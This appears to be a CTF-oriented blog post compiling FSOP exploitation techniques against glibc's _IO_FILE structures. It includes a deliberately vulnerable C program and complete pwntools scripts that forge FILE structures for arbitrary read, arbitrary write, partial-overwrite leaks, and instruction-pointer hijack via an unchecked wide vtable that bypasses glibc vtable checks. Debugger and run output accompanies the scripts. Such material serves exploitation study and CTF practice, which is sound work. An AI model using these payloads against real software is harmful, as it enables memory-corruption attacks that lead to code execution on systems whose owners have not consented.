Yet another FSOP compilation
Compilation of fsop techniques to gain arbitrary read/write and code execution via _IO_FILE
Attachments:
example1.c example arbread.py arbwrite.py partial_overwrite_read.py rce_widedata.py rce_widedata_variation.py
When angelboy released “Play with FILE structure”, FSOP became quite popular, and a lot of CTF exploits use it today. Over time, we also found additional techniques that build on top of his research.
However, I often find myself searching for specific details repeatedly. So, to save future headaches, I’ve compiled the structures and techniques I use most frequently.
_IO_FILE_plus Structure
1
2
3
4
5
6
7
8
9
10
11
12
13
14
flags _IO_read_ptr
_IO_read_end _IO_read_base
_IO_write_base _IO_write_ptr
_IO_write_end _IO_buf_base
_IO_buf_end _IO_save_base
_IO_backup_base _IO_save_end
_IO_marker _chain
_fileno _flags2
XXXX _lock
_offset _codecvt
_wide_data _freeres_list
_freeres_buf __pad5
_mode _unused2
_unused2 _jmp_table
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<stdout_>: 0x00000000fbad2a84 0x00005555555592d0 flags / _IO_read_ptr
<stdout_+16>: 0x00005555555592d0 0x00005555555592d0 _IO_read_end / _IO_read_base
<stdout_+32>: 0x00005555555592d0 0x00005555555592d0 _IO_write_base / _IO_write_ptr
<stdout_+48>: 0x00005555555592d0 0x00005555555592d0 _IO_write_end / _IO_buf_base
<stdout_+64>: 0x00005555555596d0 0x0000000000000000 _IO_buf_end / _IO_save_base
<stdout_+80>: 0x0000000000000000 0x0000000000000000 _IO_backup_base / _IO_save_end
<stdout_+96>: 0x0000000000000000 0x00007ffff7e038e0 _IO_marker / _chain
<stdout_+112>: 0x0000000000000001 0xffffffffffffffff _fileno / _flags2
<stdout_+128>: 0x0000000000000000 0x00007ffff7e05710 XXXXXX / _lock
<stdout_+144>: 0xffffffffffffffff 0x0000000000000000 _offset / _codecvt
<stdout_+160>: 0x00007ffff7e037e0 0x0000000000000000 _wide_data / _freeres_list
<stdout_+176>: 0x0000000000000000 0x0000000000000000 _freeres_buf / __pad5
<stdout_+192>: 0x00000000ffffffff 0x0000000000000000 _mode / _unused2
<stdout_+208>: 0x0000000000000000 0x00007ffff7e02030 _unused2 / vtable
Exploiting _IO_FILE_plus primarily enables three primitives:
- Arbitrary Read
- Arbitrary Write
- Code Execution
Example Challenge
For these examples, we assume a primitive that allows completely overwriting stdout or stdin, along with a trigger like scanf or printf. While partial overwrites or controlling a custom file object may require some creativity, most scenarios boil down to this.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Put stdin, stdout and stderr into unbuffered mode (_IONBF). Always returns 0. */
int setup() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
return 0;
}
void show_menu() {
printf("1. read into stdout\n");
printf("2. read into stdin\n");
printf("3. scanf heap chunk\n");
printf("4. printf heap chunk\n");
printf("5. exit\n");
printf(">> ");
}
/*
 * Deliberately vulnerable FSOP playground.
 *
 * Prints the address of system() and of a 0x200-byte heap chunk, then loops
 * over a menu:
 *   1 - read() up to 0x200 raw bytes directly over the stdout FILE object
 *   2 - read() up to 0x200 raw bytes directly over the stdin FILE object
 *   3 - scanf("%200s") into the heap chunk
 *   4 - printf the heap chunk
 *   anything else (including "5") - exit(0)
 *
 * The raw overwrites in options 1 and 2 are the intended primitive of this
 * example and are kept exactly as they are.
 *
 * NOTE(review): setup() is defined in this listing but never called here -
 * confirm whether main() is supposed to call it first.
 */
int main() {
    char* chunk = malloc(0x200);

    if (chunk == NULL) {
        return 1;
    }

    printf("system: %p\n", (void*)system);
    printf("heap: %p\n\n", (void*)chunk);

    while(1) {
        /* Start from an invalid choice: if scanf() fails (EOF or non-numeric
           input) we fall into the default branch and exit instead of
           switching on an indeterminate value. */
        int choice = 0;

        show_menu();
        scanf("%d", &choice);

        switch(choice) {
            case 1:
                /* Intentional: attacker-controlled bytes replace the stdout FILE. */
                read(0, stdout, 0x200);
                break;
            case 2:
                /* Intentional: attacker-controlled bytes replace the stdin FILE. */
                read(0, stdin, 0x200);
                break;
            case 3:
                scanf("%200s", chunk);
                break;
            case 4:
                printf("%s\n", chunk);
                break;
            default:
                exit(0);
        }
    }

    /* Not reached: the loop above only leaves through exit(0). */
    free(chunk);
}
For the basic techniques, I’ll assume you have read angelboy’s document, which explains in more detail how and why this works.
Arbitrary Read
To achieve an arbitrary read, we can abuse stdout buffering by modifying _IO_FILE. The requirements are:
- Set _fileno to 1 (stdout).
- Set _flags &= ~_IO_NO_WRITES.
- Set _flags |= _IO_CURRENTLY_PUTTING.
- Set _IO_write_base to the start of the memory to leak and _IO_write_ptr to its end.
- Set _IO_read_end to _IO_write_base.
- Set _IO_lock to a writable memory address (initialized to 0).
Note: _IO_lock needs to be set to a writable memory address, so that _IO_flush_all will not crash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/python
from pwn import *
def write_stdout(data):
    """Select menu option 1 and send *data*.

    The target reads the bytes that follow option 1 directly over its
    stdout FILE object. Uses the module-level tube ``r`` created in the
    ``__main__`` block.
    """
    r.sendline(b"1")
    r.send(data)
def exploit(r):
    """Leak 0x10 bytes from the start of libc by overwriting the stdout FILE.

    Parses the ``system`` and heap addresses the target prints at startup,
    rebases the module-level ``libc`` ELF from the ``system`` leak, and sends
    a forged FILE structure whose write area
    (``_IO_write_base`` .. ``_IO_write_ptr``) covers the bytes to leak.
    Finally hands the tube over to the user.
    """
    r.recvuntil(b": ")
    SYSTEM = int(r.recvline().strip(), 16)
    r.recvuntil(b": ")
    HEAP = int(r.recvline().strip(), 16)
    r.recvuntil(b">> ")

    libc.address = SYSTEM - libc.symbols["system"]

    log.info("SYSTEM: 0x{:x}".format(SYSTEM))
    log.info("LIBC: 0x{:x}".format(libc.address))
    log.info("HEAP: 0x{:x}".format(HEAP))

    FLAGS = 0
    FLAGS &= ~8  # _IO_NO_WRITES (no-op on 0; documents that the bit must be clear)
    FLAGS |= 0x800  # _IO_CURRENTLY_PUTTING
    FLAGS |= 0x1000  # _IO_IS_APPENDING

    TARGET = libc.address
    # Any writable, zero-initialised memory works as the lock.
    FAKE_LOCK = HEAP + 0x100

    FS = p64(FLAGS) + p64(0x0000000000000000)  # flags / _IO_read_ptr
    FS += p64(TARGET) + p64(0x0000000000000000)  # _IO_read_end / _IO_read_base
    FS += p64(TARGET) + p64(TARGET+0x10)  # _IO_write_base / _IO_write_ptr
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_write_end / _IO_buf_base
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_buf_end / _IO_save_base
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_backup_base / _IO_save_end
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _markers / _chain
    FS += p64(0x0000000000000001) + p64(0xffffffffffffffff)  # _fileno / _flags2
    FS += p64(0x0000000000000000) + p64(FAKE_LOCK)  # XXXX / _lock
    FS += p64(0xffffffffffffffff) + p64(0x0000000000000000)  # _offset / _codecvt
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _wide_data / _freeres_list
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _freeres_buf / __pad5
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _mode / _unused2
    FS += p64(0x0000000000000000) + p64(libc.symbols["_IO_file_jumps"])  # _unused2 / vtable

    write_stdout(FS)

    r.interactive()
if __name__ == "__main__":
    # `libc` and `r` are module-level names used by the functions above;
    # `libc` is rebased inside exploit().
    e = ELF("./example1")
    libc = ELF("./libc.so.6")
    r = process("./example1")
    # Print the PID and wait for a key press before starting
    # (presumably to allow attaching a debugger).
    print(util.proc.pidof(r))
    pause()
    exploit(r)
(The example also works if you only set _IO_CURRENTLY_PUTTING.)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
python3 ./arbread.py
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/example1'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/libc.so.6'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './example1': pid 115480
[115480]
[*] Paused (press any to continue)
[*] SYSTEM: 0x7ffff7c58750
[*] LIBC: 0x7ffff7c00000
[*] HEAP: 0x5555555592a0
[*] Switching to interactive mode
\x7fELF\x03\x00\x00\x00\x00\x00\x00\x00\x001. read into stdout
2. read into stdin
3. scanf heap chunk
4. printf heap chunk
5. exit
$
As an example, this simply reads the start of libc.
Arbitrary Write
Similarly, we can achieve an arbitrary write by modifying _IO_FILE:
- Set _fileno to stdin (0).
- Set _flags &= ~_IO_NO_READS.
- Set _IO_read_base = _IO_read_ptr = 0.
- Set _IO_buf_base to target_address and _IO_buf_end to the end of the region to write.
- Ensure _IO_buf_end - _IO_buf_base > size of input.
- Set _IO_lock to a writable memory address.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/python
from pwn import *
def write_stdin(data):
    """Select menu option 2, send *data*, and wait for the next prompt.

    The target reads the bytes that follow option 2 directly over its
    stdin FILE object. Uses the module-level tube ``r``.
    """
    r.sendline(b"2")
    r.send(data)
    r.recvuntil(b">> ")
def scanf_heap(data):
    """Select menu option 3, send *data* as one line, and wait for the next prompt.

    Option 3 makes the target ``scanf("%200s")`` into its heap chunk.
    Uses the module-level tube ``r``.
    """
    r.sendline(b"3")
    r.sendline(data)
    r.recvuntil(b">> ")
def exploit(r):
    """Write attacker data to ``HEAP + 0x200`` by overwriting the stdin FILE.

    Parses the ``system`` and heap addresses the target prints at startup,
    rebases the module-level ``libc`` ELF, and replaces stdin with a forged
    FILE whose buffer (``_IO_buf_base`` .. ``_IO_buf_end``) is the 0x100-byte
    range starting at TARGET. The following scanf-based input is then sent
    through option 3. Finally hands the tube over to the user.
    """
    r.recvuntil(b": ")
    SYSTEM = int(r.recvline().strip(), 16)
    r.recvuntil(b": ")
    HEAP = int(r.recvline().strip(), 16)
    r.recvuntil(b">> ")

    libc.address = SYSTEM - libc.symbols["system"]

    log.info("SYSTEM: 0x{:x}".format(SYSTEM))
    log.info("LIBC: 0x{:x}".format(libc.address))
    log.info("HEAP: 0x{:x}".format(HEAP))

    FLAGS = 0
    FLAGS &= ~4  # _IO_NO_READS (no-op on 0; documents that the bit must be clear)

    TARGET = HEAP + 0x200  # pointing to top
    # Any writable memory works as the lock.
    FAKE_LOCK = HEAP + 0x100

    FS = p64(FLAGS) + p64(0x0000000000000000)  # flags / _IO_read_ptr
    FS += p64(0x0) + p64(0x0000000000000000)  # _IO_read_end / _IO_read_base
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_write_base / _IO_write_ptr
    FS += p64(0x0000000000000000) + p64(TARGET)  # _IO_write_end / _IO_buf_base
    FS += p64(TARGET+0x100) + p64(0x0000000000000000)  # _IO_buf_end / _IO_save_base
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_backup_base / _IO_save_end
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _markers / _chain
    FS += p64(0x0000000000000000) + p64(0xffffffffffffffff)  # _fileno / _flags2
    FS += p64(0x0000000000000000) + p64(FAKE_LOCK)  # XXXX / _lock
    FS += p64(0xffffffffffffffff) + p64(0x0000000000000000)  # _offset / _codecvt
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _wide_data / _freeres_list
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _freeres_buf / __pad5
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _mode / _unused2
    FS += p64(0x0000000000000000) + p64(libc.symbols["_IO_file_jumps"])  # _unused2 / vtable

    write_stdin(FS)

    scanf_heap(b"XXXXXXXX" + p64(0xffffffffffffffff))

    r.interactive()
if __name__ == "__main__":
    # `libc` and `r` are module-level names used by the functions above;
    # `libc` is rebased inside exploit().
    e = ELF("./example1")
    libc = ELF("./libc.so.6")
    r = process("./example1")
    # Print the PID and wait for a key press before starting
    # (presumably to allow attaching a debugger).
    print(util.proc.pidof(r))
    pause()
    exploit(r)
scanf will now read the data into our heap chunk at 0x5555555592a0, but it uses our fake _IO_buf_base for buffering and thus also writes the data there (in this example, overwriting the top chunk).
1
2
3
4
5
6
7
8
9
gef➤ x/30gx 0x5555555592a0
0x5555555592a0: 0x5858585858585858 0xffffffffffffffff # heap chunk
0x5555555592b0: 0x0000000000000000 0x0000000000000000
0x5555555592c0: 0x0000000000000000 0x0000000000000000
gef➤ x/30gx 0x5555555594a0
0x5555555594a0: 0x5858585858585858 0xffffffffffffffff # heap top
0x5555555594b0: 0x000000000000000a 0x0000000000000000
0x5555555594c0: 0x0000000000000000 0x0000000000000000
Bypassing vtable Checks for Code Execution
Newer glibc versions introduced vtable verification, preventing the use of arbitrary vtable pointers for code execution. However, we can move the vtable pointer within the valid region to invoke unexpected functions. This can lead to chains that eventually call unchecked vtable entries, which we may control.
There are many ways to find such function chains by analyzing the glibc source code for file operations. While many get patched over time, let’s look at ones that still work (as of glibc-2.39).
Code Execution via _wide_data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */
__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;
wchar_t _shortbuf[1];
const struct _IO_jump_t *_wide_vtable;
};
The _wide_data structure opens up several techniques for code execution.
While doing a more constrained challenge recently, I found this chain, which turned out to be quite useful:
_IO_wdefault_xsgetn => __wunderflow => _IO_switch_to_wget_mode => _IO_WOVERFLOW
1
2
3
4
5
6
7
8
9
10
11
12
13
size_t _IO_wdefault_xsgetn(FILE *fp, void *data, size_t n) {
// ...
for (;;) {
ssize_t count = fp->_wide_data->_IO_read_end - fp->_wide_data->_IO_read_ptr;
if (count > 0) {
/* unwanted branch */
}
if (n == 0 || __wunderflow(fp) == WEOF) break;
}
return -n;
}
If count is 0 (which happens when _wide_data->_IO_read_end equals _wide_data->_IO_read_ptr), __wunderflow is called.
1
2
3
4
5
6
7
8
9
10
11
12
13
wint_t __wunderflow(FILE *fp) {
if (fp->_mode < 0 || (fp->_mode == 0 && _IO_fwide(fp, 1) != 1))
return WEOF;
if (fp->_mode == 0)
_IO_fwide(fp, 1);
if (_IO_in_put_mode(fp))
if (_IO_switch_to_wget_mode(fp) == EOF)
return WEOF;
// ...
}
If fp->_mode > 0 (a negative _mode returns WEOF right away) and fp->_flags & 0x800 (_IO_CURRENTLY_PUTTING) is set, this will call _IO_switch_to_wget_mode.
1
2
3
4
5
6
int _IO_switch_to_wget_mode(FILE *fp) {
if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
if ((wint_t)_IO_WOVERFLOW(fp, WEOF) == WEOF)
return EOF;
// ...
}
_IO_WOVERFLOW is a macro that expands to:
1
2
3
4
5
6
#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
#define _IO_WIDE_JUMPS(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable
Thus, it calls __overflow from wide_data->wide_vtable, which is not subject to vtable verification.
We just need to satisfy the following constraints:
- _flags & 0x800 (_IO_CURRENTLY_PUTTING)
- fp->_mode > 0
- _wide_data->_IO_read_end == _wide_data->_IO_read_ptr (calls __wunderflow)
- _wide_data->_IO_write_ptr > _wide_data->_IO_write_base (calls _IO_WOVERFLOW)
- Control over _wide_data
If met, _IO_WOVERFLOW will use the wide vtable, which we fully control.
To clarify the concept, the example exploit separates the _IO_FILE structure, wide_data, and wide_vtable.
The nice thing with this chain is that we could also pack everything into a single _IO_FILE structure using overlapping offsets, which is useful when the write primitive is limited.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python
from pwn import *
def write_stdout(data):
    """Select menu option 1 and send *data*.

    The target reads the bytes that follow option 1 directly over its
    stdout FILE object. Uses the module-level tube ``r`` created in the
    ``__main__`` block.
    """
    r.sendline(b"1")
    r.send(data)
def exploit(r):
    """Demonstrate control of rip through the unchecked wide vtable.

    Parses the ``system`` and heap addresses the target prints at startup,
    rebases the module-level ``libc`` ELF, and sends one contiguous payload
    over stdout consisting of:

    * the forged FILE structure (0xe0 bytes),
    * a fake ``_IO_wide_data`` placed directly behind it (stdout + 0xe0),
    * a fake wide vtable directly behind that, whose ``__overflow`` slot
      (+0x18) holds the placeholder address 0xdeadbeef.

    Finally hands the tube over to the user.
    """
    r.recvuntil(b": ")
    SYSTEM = int(r.recvline().strip(), 16)
    r.recvuntil(b": ")
    HEAP = int(r.recvline().strip(), 16)
    r.recvuntil(b">> ")

    libc.address = SYSTEM - libc.symbols["system"]

    log.info("SYSTEM: 0x{:x}".format(SYSTEM))
    log.info("LIBC: 0x{:x}".format(libc.address))
    log.info("HEAP: 0x{:x}".format(HEAP))

    FLAGS = 0x00000000fbad0800  # includes 0x800 (_IO_CURRENTLY_PUTTING)
    FAKE_LOCK = HEAP + 0x100

    # trigger _IO_wdefault_xsgetn in _IO_flush_all
    FAKE_VTABLE = libc.symbols["_IO_file_jumps"] - 0x68 - 0x18
    # 0xe0 is the length of FS below, so wide_data follows it in the payload.
    FAKE_WIDE_DATA = libc.symbols["_IO_2_1_stdout_"] + 0xe0
    # 0xf0 is the length of wide_data below, so wide_vtable follows it.
    FAKE_WIDE_VTABLE = FAKE_WIDE_DATA + 0xf0

    # overwrite _mode with 1 and point vtable, so _IO_wdefault_xsgetn will be called in _IO_flush_all
    FS = p64(FLAGS) + p64(0x0000000000000000)  # flags / _IO_read_ptr
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_read_end / _IO_read_base
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_write_base / _IO_write_ptr
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_write_end / _IO_buf_base
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_buf_end / _IO_save_base
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_backup_base / _IO_save_end
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _markers / _chain
    FS += p64(0x0000000000000001) + p64(0xffffffffffffffff)  # _fileno / _flags2
    FS += p64(0x0000000000000000) + p64(FAKE_LOCK)  # XXXX / _lock
    FS += p64(0xffffffffffffffff) + p64(0x0000000000000000)  # _offset / _codecvt
    FS += p64(FAKE_WIDE_DATA) + p64(0x0000000000000000)  # _wide_data / _freeres_list
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _freeres_buf / __pad5
    FS += p64(0x0000000000000001) + p64(0x0000000000000000)  # _mode / _unused2
    FS += p64(0x0000000000000000) + p64(FAKE_VTABLE)  # _unused2 / vtable

    # forge wide_data, so that __wunderflow -> _IO_switch_to_wget_mode will be called
    # (read_ptr == read_end, and write_ptr > write_base)
    wide_data = p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_read_ptr / _IO_read_end
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000100)  # _IO_read_base / _IO_write_base
    wide_data += p64(0x0000000000000400) + p64(0x0000000000000000)  # _IO_write_ptr / _IO_write_end
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_buf_base / _IO_buf_end
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_save_base / _IO_backup_base
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_save_end
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_data += p64(FAKE_WIDE_VTABLE) + p64(0x0000000000000000)  # wide_data._wide_vtable

    # _IO_WOVERFLOW will call vtable+0x18
    wide_vtable = p64(0x0000000000000000) + p64(0x0000000000000000)
    wide_vtable += p64(0x0000000000000000) + p64(0xdeadbeef)  # X / __overflow

    payload = FS + wide_data + wide_vtable

    write_stdout(payload)

    r.interactive()
if __name__ == "__main__":
    # `libc` and `r` are module-level names used by the functions above;
    # `libc` is rebased inside exploit().
    e = ELF("./example1")
    libc = ELF("./libc.so.6")
    r = process("./example1")
    # Print the PID and wait for a key press before starting
    # (presumably to allow attaching a debugger).
    print(util.proc.pidof(r))
    pause()
    exploit(r)
This will satisfy all the constraints and when exiting the challenge, it will trigger the chain in _IO_flush_all resulting in:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x00007ffff7e04790 → 0x0000000000000000
$rbx : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rcx : 0x1
$rdx : 0x400
$rsp : 0x00007fffffffd208 → 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff
$rbp : 0x00007fffffffd220 → 0x00007fffffffd260 → 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0
$rsi : 0xffffffff
$rdi : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rip : 0xdeadbeef
$r8 : 0x00007fffffffd310 → 0x00000001ffffd320
$r9 : 0x0
$r10 : 0x00007fffffffd29f → 0x007fffffffd2b000
$r11 : 0x00007fffffffd2a0 → 0x00007fffffffd2b0 → 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0
$r12 : 0xffffffff
$r13 : 0xd0
$r14 : 0x00007ffff7e045c0 → 0x00000000fbad0800
$r15 : 0x00007ffff7e056f0 → 0x0000000000000001
$eflags: [zero CARRY PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffd208│+0x0000: 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff ← $rsp
0x00007fffffffd210│+0x0008: 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0 → 0x00007fffffffd500
0x00007fffffffd218│+0x0010: 0x00000000000000d0
0x00007fffffffd220│+0x0018: 0x00007fffffffd260 → 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0 ← $rbp
0x00007fffffffd228│+0x0020: 0x00007ffff7c8b533 → <_IO_wdefault_xsgetn+0203> cmp eax, 0xffffffff
0x00007fffffffd230│+0x0028: 0x00007ffff7fbd160 → 0x00007ffff7c00000 → 0x03010102464c457f
0x00007fffffffd238│+0x0030: 0x00007ffff7e045c0 → 0x00000000fbad0800
0x00007fffffffd240│+0x0038: 0x0000000000000000
Here we control rip, rdi (_IO_FILE struct/stdout), and rdx (_widedata._IO_write_ptr).
In newer glibc versions, setcontext uses rdx instead of rdi for setting the new stack pointer. This handles both cases and enables easy stack pivoting via setcontext again.
Variations with Limited Control
Building on these techniques, there are several variations. For instance, partial overwrites of existing _IO_FILE addresses can provide leaks when none exist, or overwriting buffer end pointers can enable large writes into libc.
Partial Overwrite for Leaks
If we lack the leaks required to fully control the _IO_FILE struct, a partial overwrite can often trigger a huge leak.
1
2
3
4
5
6
7
8
# Flags for the forged stdout: writable, currently putting, appending.
FLAGS = 0
FLAGS &= ~8 # _IO_NO_WRITES (no-op on 0; documents that the bit must be clear)
FLAGS |= 0x800 # _IO_CURRENTLY_PUTTING
FLAGS |= 0x1000 # _IO_IS_APPENDING
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p16(0x0) # _IO_write_base (partial overwrite: only the two low bytes are replaced)
1
2
3
0x7ffff7e045c0 <_IO_2_1_stdout_>: 0x0000000000001800 0x0000000000000000
0x7ffff7e045d0 <_IO_2_1_stdout_+16>: 0x0000000000000000 0x0000000000000000
0x7ffff7e045e0 <_IO_2_1_stdout_+32>: 0x00007ffff7e00000 0x00007ffff7e04644
This will often be enough to trigger a huge leak containing a lot of libc addresses, which can then be used for further exploitation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python
from pwn import *
def write_stdout(data):
    """Select menu option 1 and send *data*.

    The target reads the bytes that follow option 1 directly over its
    stdout FILE object. Uses the module-level tube ``r`` created in the
    ``__main__`` block.
    """
    r.sendline(b"1")
    r.send(data)
def exploit(r):
    """Trigger a leak without knowing any address, via a partial overwrite.

    Overwrites only the first 0x22 bytes of the stdout FILE: the flags, the
    three read pointers (zeroed), and the two low bytes of ``_IO_write_base``.
    Then receives up to 0x1000 bytes of output, prints them as a hexdump, and
    hands the tube over to the user.
    """
    r.recvuntil(b">> ")

    FLAGS = 0
    FLAGS &= ~8  # _IO_NO_WRITES (no-op on 0; documents that the bit must be clear)
    FLAGS |= 0x800  # _IO_CURRENTLY_PUTTING
    FLAGS |= 0x1000  # _IO_IS_APPENDING

    FS = p64(FLAGS) + p64(0x0000000000000000)  # flags / _IO_read_ptr
    FS += p64(0x0000000000000000) + p64(0x0000000000000000)  # _IO_read_end / _IO_read_base
    FS += p16(0x0)  # _IO_write_base (partial overwrite)

    write_stdout(FS)

    LEAK = r.recv(0x1000)
    print(hexdump(LEAK))

    r.interactive()
if __name__ == "__main__":
    # `r` is a module-level name used by write_stdout() above.
    r = process("./example1")
    # Print the PID and wait for a key press before starting
    # (presumably to allow attaching a debugger).
    print(util.proc.pidof(r))
    pause()
    exploit(r)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/example1'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/libc.so.6'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[x] Starting local process './example1'
[+] Starting local process './example1': pid 303571
[303571]
[*] Paused (press enter to continue)
00000000 32 00 00 00 00 00 00 00 33 00 00 00 00 00 00 00 │2···│····│3···│····│
00000010 34 00 00 00 00 00 00 00 35 00 00 00 00 00 00 00 │4···│····│5···│····│
00000020 36 00 00 00 00 00 00 00 37 00 00 00 00 00 00 00 │6···│····│7···│····│
00000030 38 00 00 00 00 00 00 00 39 00 00 00 00 00 00 00 │8···│····│9···│····│
00000040 7b 06 00 00 00 00 00 00 a0 d4 db f7 ff 7f 00 00 │{···│····│····│····│
00000050 c0 a0 db f7 ff 7f 00 00 c0 86 db f7 ff 7f 00 00 │····│····│····│····│
00000060 c0 2a db f7 ff 7f 00 00 01 00 00 00 00 00 00 00 │·*··│····│····│····│
00000070 e8 5e dd f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │·^··│····│····│····│
